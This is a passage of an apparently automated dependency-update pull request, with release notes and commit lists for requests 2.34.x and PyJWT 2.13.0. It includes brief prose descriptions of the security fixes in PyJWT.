href=\"https://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\"\u003ehttps://github.com/psf/requests/blob/main/HISTORY.md#2341-2026-05-13\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.34.0\u003c/h2\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. \u003cstrong\u003eWe believe types are comprehensive but if you find issues, please\nreport them to the \u003ca href=\"https://redirect.github.com/psf/requests/issues/7271\"\u003epinned tracking issue\u003c/a\u003e.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.34.2 (2026-05-14)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved \u003ccode\u003eheaders\u003c/code\u003e input type back to \u003ccode\u003eMapping\u003c/code\u003e to avoid invariance issues\nwith \u003ccode\u003eMutableMapping\u003c/code\u003e and inferred dict types. Users calling\n\u003ccode\u003eRequest.headers.update()\u003c/code\u003e may need to narrow typing in their code. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.1 (2026-05-13)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWidened \u003ccode\u003ejson\u003c/code\u003e input type from \u003ccode\u003edict\u003c/code\u003e and \u003ccode\u003elist\u003c/code\u003e to \u003ccode\u003eMapping\u003c/code\u003e\nand \u003ccode\u003eSequence\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eChanged \u003ccode\u003eheaders\u003c/code\u003e input type to MutableMapping and removed \u003ccode\u003eNone\u003c/code\u003e from\n\u003ccode\u003eRequest.headers\u003c/code\u003e typing to improve handling for users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eResponse.reason\u003c/code\u003e moved from \u003ccode\u003estr | None\u003c/code\u003e to \u003ccode\u003estr\u003c/code\u003e to improve handling\nfor users. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed a bug where some bodies with custom \u003ccode\u003e__getattr__\u003c/code\u003e implementations\nweren't being properly detected as Iterables. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7433\"\u003e#7433\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.34.0 (2026-05-11)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eAnnouncements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRequests 2.34.0 introduces inline types, replacing those provided by\ntypeshed. Public API types should be fully compatible with mypy, pyright,\nand ty. We believe types are comprehensive but if you find issues, please\nreport them to the pinned tracking issue.\u003c/p\u003e\n\u003cp\u003eSpecial thanks to \u003ca href=\"https://github.com/bastimeyer\"\u003e\u003ccode\u003e@​bastimeyer\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/cthoyt\"\u003e\u003ccode\u003e@​cthoyt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/edgarrmondragon\"\u003e\u003ccode\u003e@​edgarrmondragon\u003c/code\u003e\u003c/a\u003e, and \u003ca href=\"https://github.com/srittau\"\u003e\u003ccode\u003e@​srittau\u003c/code\u003e\u003c/a\u003e for\nhelping review and test the types ahead of the release. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7272\"\u003e#7272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDigest Auth hashing algorithms have added \u003ccode\u003eusedforsecurity=False\u003c/code\u003e to clarify\nsecurity considerations. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7310\"\u003e#7310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.15 based on beta1. Downstream projects\nshould be able to start testing prior to its release in October. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7422\"\u003e#7422\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests added support for Python 3.14t. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7419\"\u003e#7419\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eResponse.history\u003c/code\u003e no longer contains a reference to itself, preventing\naccidental looping when traversing the history list. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7328\"\u003e#7328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer performs greedy matching on no_proxy domains. The\nproxy_bypass implementation has been updated with CPython's fix from\nbpo-39057. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRequests no longer incorrectly strips duplicate leading slashes in\nURI paths. This should address user issues with specific presigned\nURLs. Note the full fix requires urllib3 2.7.0+. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7315\"\u003e#7315\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6e83187b8feb273ed4c6cdab5efd8d54901dfab3\"\u003e\u003ccode\u003e6e83187\u003c/code\u003e\u003c/a\u003e v2.34.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/84d10f0be83e8f6aeca8a05230c52216431c4d0b\"\u003e\u003ccode\u003e84d10f0\u003c/code\u003e\u003c/a\u003e Move Request.headers back to Mapping (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7441\"\u003e#7441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/b7b549b54571d03950b16afd2d01bc6ff0348224\"\u003e\u003ccode\u003eb7b549b\u003c/code\u003e\u003c/a\u003e v2.34.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/e511bc72777a94c45d004e010c597925092e1efe\"\u003e\u003ccode\u003ee511bc7\u003c/code\u003e\u003c/a\u003e Fix mutability issues with headers input types (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7431\"\u003e#7431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5691f596134c2feb121e595c77a0178921fcce61\"\u003e\u003ccode\u003e5691f59\u003c/code\u003e\u003c/a\u003e Update JsonType containers to read-based collections (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7436\"\u003e#7436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/2144213c307691710c9d665700860fc4993c3035\"\u003e\u003ccode\u003e2144213\u003c/code\u003e\u003c/a\u003e Constrain Response.reason to str (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7437\"\u003e#7437\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6404f345e562d962abe6700a1c357ec1e7e18232\"\u003e\u003ccode\u003e6404f34\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003eprepare_body\u003c/code\u003e stream detection for \u003ccode\u003e__getattr__\u003c/code\u003e-based file wrappers (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7\"\u003e#7\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/0b401c76b6e80a4eecf3c690085b2553f6e261ca\"\u003e\u003ccode\u003e0b401c7\u003c/code\u003e\u003c/a\u003e v2.34.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/86b378d3f60f828daa13ca50aa82e287ff7b66b4\"\u003e\u003ccode\u003e86b378d\u003c/code\u003e\u003c/a\u003e Align Session.get parameters with requests.get (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7429\"\u003e#7429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a4f9a5999bdb9bf2d6e7c8aa973b28cacb17134f\"\u003e\u003ccode\u003ea4f9a59\u003c/code\u003e\u003c/a\u003e Port bpo-39057 to Requests (\u003ca href=\"https://redirect.github.com/psf/requests/issues/7427\"\u003e#7427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.33.1...v2.34.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 